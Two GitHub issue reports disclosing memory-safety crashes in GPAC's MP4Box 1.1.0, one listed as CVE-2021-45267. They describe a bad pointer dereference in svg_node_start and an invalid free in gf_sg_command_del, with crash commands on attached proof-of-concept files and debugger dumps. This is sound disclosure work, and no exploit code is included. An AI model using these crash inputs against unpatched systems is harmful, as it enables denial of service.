An invalid memory address dereference vulnerability exists in gpac 1.1.0 via the svg_node_start function, which causes a segmentation fault and application crash.

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

An invalid memory address dereference was discovered in svg\_node\_start(). The vulnerability causes a segmentation fault and application crash.

**Version:**

    MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV
    (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
            GPAC Filters: https://doi.org/10.1145/3339825.3394929
            GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration:
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**System information**  
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

**command:**

poc\_2.zip

**Result**

    [Parser] LASeR Scene Parsing: ./poc/poc_2.xsr
    [1]    75845 segmentation fault  ./MP4Box -lsr ./poc/poc_2.xsr
    

**gdb**

    Program received signal SIGSEGV, Segmentation fault.
    0x00007ffff7aa5f97 in svg_node_start () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
     RAX  0x0
     RBX  0x5555555c7750 ◂— 0x0
     RCX  0x0
     RDX  0x5555555ce2b0 —▸ 0x5555555ce0e3 ◂— 0x7572742200706172 /* 'rap' */
     RDI  0x7ffff7e447c9 ◂— 'Unable to parse chunk: %s'
     RSI  0x5555555ce0e3 ◂— 0x7572742200706172 /* 'rap' */
     R8   0x7fffffff5c3c ◂— 0x0
     R9   0x5555555ce0e3 ◂— 0x7572742200706172 /* 'rap' */
     R10  0x0
     R11  0x0
     R12  0x5555555ce2b0 —▸ 0x5555555ce0e3 ◂— 0x7572742200706172 /* 'rap' */
     R13  0x5555555ce0d5 ◂— 0x6e65637300666173 /* 'saf' */
     R14  0x1
     R15  0x0
     RBP  0x5555555cf390 —▸ 0x7fffffff7310 ◂— 0x7
     RSP  0x7fffffff5bb0 ◂— 0x0
     RIP  0x7ffff7aa5f97 (svg_node_start+3095) ◂— mov    rdi, qword ptr [rax + 0x20]
    ──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
     ► 0x7ffff7aa5f97 <svg_node_start+3095>    mov    rdi, qword ptr [rax + 0x20]
       0x7ffff7aa5f9b <svg_node_start+3099>    call   gf_list_count@plt                <gf_list_count@plt>
    
       0x7ffff7aa5fa0 <svg_node_start+3104>    test   eax, eax
       0x7ffff7aa5fa2 <svg_node_start+3106>    sete   r15b
       0x7ffff7aa5fa6 <svg_node_start+3110>    test   r14d, r14d
       0x7ffff7aa5fa9 <svg_node_start+3113>    jne    svg_node_start+6240                <svg_node_start+6240>
    
       0x7ffff7aa5faf <svg_node_start+3119>    xor    esi, esi
       0x7ffff7aa5fb1 <svg_node_start+3121>    nop    dword ptr [rax]
       0x7ffff7aa5fb8 <svg_node_start+3128>    mov    rdi, qword ptr [rbp + 0x50]
       0x7ffff7aa5fbc <svg_node_start+3132>    mov    edx, r15d
       0x7ffff7aa5fbf <svg_node_start+3135>    pxor   xmm0, xmm0
    ──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
    00:0000│ rsp 0x7fffffff5bb0 ◂— 0x0
    01:0008│     0x7fffffff5bb8 —▸ 0x5555555ce0d9 ◂— 'sceneUnit'
    02:0010│     0x7fffffff5bc0 ◂— 0x0
    03:0018│     0x7fffffff5bc8 ◂— 0x0
    04:0020│     0x7fffffff5bd0 —▸ 0x5555555ce0d5 ◂— 0x6e65637300666173 /* 'saf' */
    05:0028│     0x7fffffff5bd8 ◂— 0x0
    06:0030│     0x7fffffff5be0 ◂— 0x0
    07:0038│     0x7fffffff5be8 ◂— 0x3000000020 /* ' ' */
    ────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
     ► f 0   0x7ffff7aa5f97 svg_node_start+3095
       f 1   0x7ffff781fbc5 xml_sax_node_start+453
       f 2   0x7ffff7820e6c xml_sax_parse+3596
       f 3   0x7ffff78213d6 gf_xml_sax_parse_intern+950
       f 4   0x7ffff7821595 gf_xml_sax_parse+165
       f 5   0x7ffff7821633 xml_sax_read_file.part+115
       f 6   0x7ffff7821927 gf_xml_sax_parse_file+295
       f 7   0x7ffff7aa42da load_svg_run+58
    ──────────────────────────────────────────────────────────────────────────────────────────────────────
    pwndbg> bt
    #0  0x00007ffff7aa5f97 in svg_node_start () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #1  0x00007ffff781fbc5 in xml_sax_node_start () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #2  0x00007ffff7820e6c in xml_sax_parse () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #3  0x00007ffff78213d6 in gf_xml_sax_parse_intern () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #4  0x00007ffff7821595 in gf_xml_sax_parse () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #5  0x00007ffff7821633 in xml_sax_read_file.part () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #6  0x00007ffff7821927 in gf_xml_sax_parse_file () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #7  0x00007ffff7aa42da in load_svg_run () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    #8  0x00005555555844a8 in dump_isom_scene ()
    #9  0x000055555557b42c in mp4boxMain ()
    #10 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe188, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe178) at ../csu/libc-start.c:308
    #11 0x000055555556c45e in _start ()

CVE-2021-45267: Invalid memory address dereference in svg_node_start() · Issue #1965 · gpac/gpac

An invalid free vulnerability exists in gpac 1.1.0 via the gf_sg_command_del function, which causes a segmentation fault and application crash.

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

An invalid free was discovered in gf\_sg\_command\_del(). The vulnerability causes a segmentation fault and application crash.

**Version:**

    MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV
    (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
            GPAC Filters: https://doi.org/10.1145/3339825.3394929
            GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration:
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**System information**  
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

**command:**

    ./MP4Box -bt ./poc/poc_17
    

poc\_17.zip

**Result**

    [iso file] extra box maxr found in hinf, deleting
    [iso file] extra box maxr found in hinf, deleting
    [iso file] Unknown box type 80rak in parent moov
    [iso file] Unknown box type prl  in parent dref
    [iso file] Incomplete box mdat - start 11495 size 860323
    [iso file] Incomplete file while reading for dump - aborting parsing
    [iso file] extra box maxr found in hinf, deleting
    [iso file] extra box maxr found in hinf, deleting
    [iso file] Unknown box type 80rak in parent moov
    [iso file] Unknown box type prl  in parent dref
    [iso file] Incomplete box mdat - start 11495 size 860323
    [iso file] Incomplete file while reading for dump - aborting parsing
    MPEG-4 LASeR Scene Parsing
    [LASeR] memory overread - corrupted decoding
    [LASeR] memory overread - corrupted decoding
    [MP4 Loading] decoding sample 1 from track ID 8 failed
    free(): invalid pointer
    [1]    3334251 abort      ./MP4Box -bt ./poc/poc_17
    

**gdb**

    free(): invalid pointer
    
    Program received signal SIGABRT, Aborted.
    __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
    50      ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ───────────────────────────────[ REGISTERS ]────────────────────────────────
     RAX  0x0
     RBX  0x7ffff72bf040 ◂— 0x7ffff72bf040
     RCX  0x7ffff758218b (raise+203) ◂— mov    rax, qword ptr [rsp + 0x108]
     RDX  0x0
     RDI  0x2
     RSI  0x7fffffff6f20 ◂— 0x0
     R8   0x0
     R9   0x7fffffff6f20 ◂— 0x0
     R10  0x8
     R11  0x246
     R12  0x7fffffff7190 ◂— 0x0
     R13  0x10
     R14  0x7ffff7ffb000 ◂— 0x6565726600001000
     R15  0x1
     RBP  0x7fffffff7270 —▸ 0x5555555df1e0 —▸ 0x5555555d4370 ◂— 0x0
     RSP  0x7fffffff6f20 ◂— 0x0
     RIP  0x7ffff758218b (raise+203) ◂— mov    rax, qword ptr [rsp + 0x108]
    ───────────────────────────────────────[ DISASM ]────────────────────────────────────────
     ► 0x7ffff758218b <raise+203>    mov    rax, qword ptr [rsp + 0x108]
       0x7ffff7582193 <raise+211>    xor    rax, qword ptr fs:[0x28]
       0x7ffff758219c <raise+220>    jne    raise+260                <raise+260>
        ↓
       0x7ffff75821c4 <raise+260>    call   __stack_chk_fail                <__stack_chk_fail>
    
       0x7ffff75821c9                nop    dword ptr [rax]
       0x7ffff75821d0 <killpg>       endbr64
       0x7ffff75821d4 <killpg+4>     test   edi, edi
       0x7ffff75821d6 <killpg+6>     js     killpg+16                <killpg+16>
    
       0x7ffff75821d8 <killpg+8>     neg    edi
       0x7ffff75821da <killpg+10>    jmp    kill                <kill>
    
       0x7ffff75821df <killpg+15>    nop
    ────────────────────────────────────────[ STACK ]────────────────────────────────────────
    00:0000│ rsi r9 rsp 0x7fffffff6f20 ◂— 0x0
    01:0008│            0x7fffffff6f28 —▸ 0x7ffff77534c8 ◂— 0xe001200003748 /* 'H7' */
    02:0010│            0x7fffffff6f30 —▸ 0x7fffffff72f0 —▸ 0x5555555d47a0 —▸ 0x5555555d4370 ◂— 0x0
    03:0018│            0x7fffffff6f38 —▸ 0x7ffff7fe7c2e ◂— mov    r11, rax
    04:0020│            0x7fffffff6f40 ◂— 0x0
    05:0028│            0x7fffffff6f48 ◂— 0x0
    06:0030│            0x7fffffff6f50 —▸ 0x5555555df390 —▸ 0x5555555df3f0 —▸ 0x5555555df0f0 ◂— 0x0
    07:0038│            0x7fffffff6f58 ◂— 0x0
    ──────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────
     ► f 0   0x7ffff758218b raise+203
       f 1   0x7ffff7561859 abort+299
       f 2   0x7ffff75cc3ee __libc_message+670
       f 3   0x7ffff75d447c
       f 4   0x7ffff75d5cac _int_free+748
       f 5   0x7ffff784f461 gf_sg_command_del+353
       f 6   0x7ffff7a88203 gf_sm_del+195
       f 7   0x555555584423 dump_isom_scene+627
    ─────────────────────────────────────────────────────────────────────────────────────────
    

`break gf_svg_delete_attribute_value`

    pwndbg>
    0x00007ffff784f45c in gf_sg_command_del () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ───────────────────────────────[ REGISTERS ]────────────────────────────────
     RAX  0x0
     RBX  0x0
     RCX  0x5555555df310 ◂— 0x0
    *RDX  0x5555555d4370 ◂— 0x0
     RDI  0x0
     RSI  0x5555555df300 ◂— 0x0
     R8   0x2
     R9   0xfffffff6
     R10  0x7ffff775ba72 ◂— 'gf_node_unregister_children'
     R11  0x7ffff784a6d0 (gf_node_unregister_children) ◂— endbr64
     R12  0x5555555df2e0 ◂— 0x0
     R13  0x5555555d47a0 —▸ 0x5555555d4370 ◂— 0x0
     R14  0x5555555d4370 ◂— 0x0
     R15  0x0
     RBP  0x5555555df1e0 —▸ 0x5555555d4370 ◂— 0x0
     RSP  0x7fffffff7310 ◂— 0x1
    *RIP  0x7ffff784f45c (gf_sg_command_del+348) ◂— call   0x7ffff78c7fb0
    ───────────────────────────────────────[ DISASM ]────────────────────────────────────────
       0x7ffff784f449 <gf_sg_command_del+329>    mov    rsi, qword ptr [r12 + 8]
       0x7ffff784f44e <gf_sg_command_del+334>    test   rsi, rsi
       0x7ffff784f451 <gf_sg_command_del+337>    je     gf_sg_command_del+255
    <gf_sg_command_del+255>
    
       0x7ffff784f453 <gf_sg_command_del+339>    mov    edi, dword ptr [r12 + 4]
       0x7ffff784f458 <gf_sg_command_del+344>    mov    rdx, qword ptr [rbp]
     ► 0x7ffff784f45c <gf_sg_command_del+348>    call   gf_svg_delete_attribute_value                <gf_svg_delete_attribute_value>
            rdi: 0x0
            rsi: 0x5555555df300 ◂— 0x0
            rdx: 0x5555555d4370 ◂— 0x0
            rcx: 0x5555555df310 ◂— 0x0
    
       0x7ffff784f461 <gf_sg_command_del+353>    jmp    gf_sg_command_del+255
    <gf_sg_command_del+255>
    
       0x7ffff784f463 <gf_sg_command_del+355>    nop    dword ptr [rax + rax]
       0x7ffff784f468 <gf_sg_command_del+360>    mov    rdi, qword ptr [r12 + 8]
       0x7ffff784f46d <gf_sg_command_del+365>    test   rdi, rdi
       0x7ffff784f470 <gf_sg_command_del+368>    je     gf_sg_command_del+384
    <gf_sg_command_del+384>
    ────────────────────────────────────────[ STACK ]────────────────────────────────────────
    00:0000│ rsp 0x7fffffff7310 ◂— 0x1
    01:0008│     0x7fffffff7318 ◂— 0x5cf4ff747866de00
    02:0010│     0x7fffffff7320 —▸ 0x7fffffff7340 —▸ 0x5555555df1e0 —▸ 0x5555555d4370 ◂— 0x0
    03:0018│     0x7fffffff7328 —▸ 0x5555555defe0 ◂— 0x8
    04:0020│     0x7fffffff7330 —▸ 0x5555555df130 ◂— 0x0
    05:0028│     0x7fffffff7338 —▸ 0x7ffff7a88203 (gf_sm_del+195) ◂— jmp    0x7ffff7a881c8
    06:0030│     0x7fffffff7340 —▸ 0x5555555df1e0 —▸ 0x5555555d4370 ◂— 0x0
    07:0038│     0x7fffffff7348 ◂— 0x5cf4ff747866de00
    ──────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────
     ► f 0   0x7ffff784f45c gf_sg_command_del+348
       f 1   0x7ffff7a88203 gf_sm_del+195
       f 2   0x555555584423 dump_isom_scene+627
       f 3   0x55555557b42c mp4boxMain+9228
       f 4   0x7ffff75630b3 __libc_start_main+243
    ─────────────────────────────────────────────────────────────────────────────────────────
    pwndbg>
    free(): invalid pointer
    
    Program received signal SIGABRT, Aborted.
    __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
    50      ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ───────────────────────────────[ REGISTERS ]────────────────────────────────
     RAX  0x0
    *RBX  0x7ffff72bf040 ◂— 0x7ffff72bf040
    *RCX  0x7ffff758218b (raise+203) ◂— mov    rax, qword ptr [rsp + 0x108]
    *RDX  0x0
    *RDI  0x2
    *RSI  0x7fffffff6f20 ◂— 0x0
    *R8   0x0
    *R9   0x7fffffff6f20 ◂— 0x0
    *R10  0x8
    *R11  0x246
    *R12  0x7fffffff7190 ◂— 0x0
    *R13  0x10
    *R14  0x7ffff7ffb000 ◂— 0x6565726600001000
    *R15  0x1
    *RBP  0x7fffffff7270 —▸ 0x5555555df1e0 —▸ 0x5555555d4370 ◂— 0x0
    *RSP  0x7fffffff6f20 ◂— 0x0
    *RIP  0x7ffff758218b (raise+203) ◂— mov    rax, qword ptr [rsp + 0x108]
    ───────────────────────────────────────[ DISASM ]────────────────────────────────────────
     ► 0x7ffff758218b <raise+203>    mov    rax, qword ptr [rsp + 0x108]
       0x7ffff7582193 <raise+211>    xor    rax, qword ptr fs:[0x28]
       0x7ffff758219c <raise+220>    jne    raise+260                <raise+260>
        ↓
       0x7ffff75821c4 <raise+260>    call   __stack_chk_fail                <__stack_chk_fail>
    
       0x7ffff75821c9                nop    dword ptr [rax]
       0x7ffff75821d0 <killpg>       endbr64
       0x7ffff75821d4 <killpg+4>     test   edi, edi
       0x7ffff75821d6 <killpg+6>     js     killpg+16                <killpg+16>
    
       0x7ffff75821d8 <killpg+8>     neg    edi
       0x7ffff75821da <killpg+10>    jmp    kill                <kill>
    
       0x7ffff75821df <killpg+15>    nop
    ────────────────────────────────────────[ STACK ]────────────────────────────────────────
    00:0000│ rsi r9 rsp 0x7fffffff6f20 ◂— 0x0
    01:0008│            0x7fffffff6f28 —▸ 0x7ffff77534c8 ◂— 0xe001200003748 /* 'H7' */
    02:0010│            0x7fffffff6f30 —▸ 0x7fffffff72f0 —▸ 0x5555555d47a0 —▸ 0x5555555d4370 ◂— 0x0
    03:0018│            0x7fffffff6f38 —▸ 0x7ffff7fe7c2e ◂— mov    r11, rax
    04:0020│            0x7fffffff6f40 ◂— 0x0
    05:0028│            0x7fffffff6f48 ◂— 0x0
    06:0030│            0x7fffffff6f50 —▸ 0x5555555df390 —▸ 0x5555555df3f0 —▸ 0x5555555df0f0 ◂— 0x0
    07:0038│            0x7fffffff6f58 ◂— 0x0
    ──────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────
     ► f 0   0x7ffff758218b raise+203
       f 1   0x7ffff7561859 abort+299
       f 2   0x7ffff75cc3ee __libc_message+670
       f 3   0x7ffff75d447c
       f 4   0x7ffff75d5cac _int_free+748
       f 5   0x7ffff784f461 gf_sg_command_del+353
       f 6   0x7ffff7a88203 gf_sm_del+195
       f 7   0x555555584423 dump_isom_scene+627

Tag

#ubuntu